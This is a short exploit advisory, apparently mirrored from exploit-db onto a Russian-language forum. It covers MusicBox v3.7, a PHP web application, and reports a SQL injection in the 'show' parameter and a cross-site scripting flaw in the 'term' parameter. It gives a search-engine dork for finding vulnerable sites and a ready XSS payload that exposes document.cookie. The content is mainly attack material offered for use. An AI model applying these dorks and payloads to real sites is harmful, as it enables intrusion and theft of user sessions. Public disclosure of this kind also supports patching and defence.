- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 17570
- Проверка EDB
-
- Пройдено
- Автор
- R@1D3N
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2011-07-25
Код:
============================================================
MusicBox <= v3.7 Multiple Vulnerabilities
============================================================
[~] Author : R@1D3N (amin emami)
[~] Software Link : www.musicboxv2.com
[~] Price : $275
[~] Version : v3.7 and previous versions
[~] Contact : [email protected] <~
[~] DorK : inurl:genre_artists.php
[~] Forum : http://ashiyane.org/forums/
[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db
[~] Tested on: Windows XP Sp3
vul1.sql injection:
/[Path]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK]
Vul2.Cross site Scripting:
/[path]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0- Источник
- www.exploit-db.com
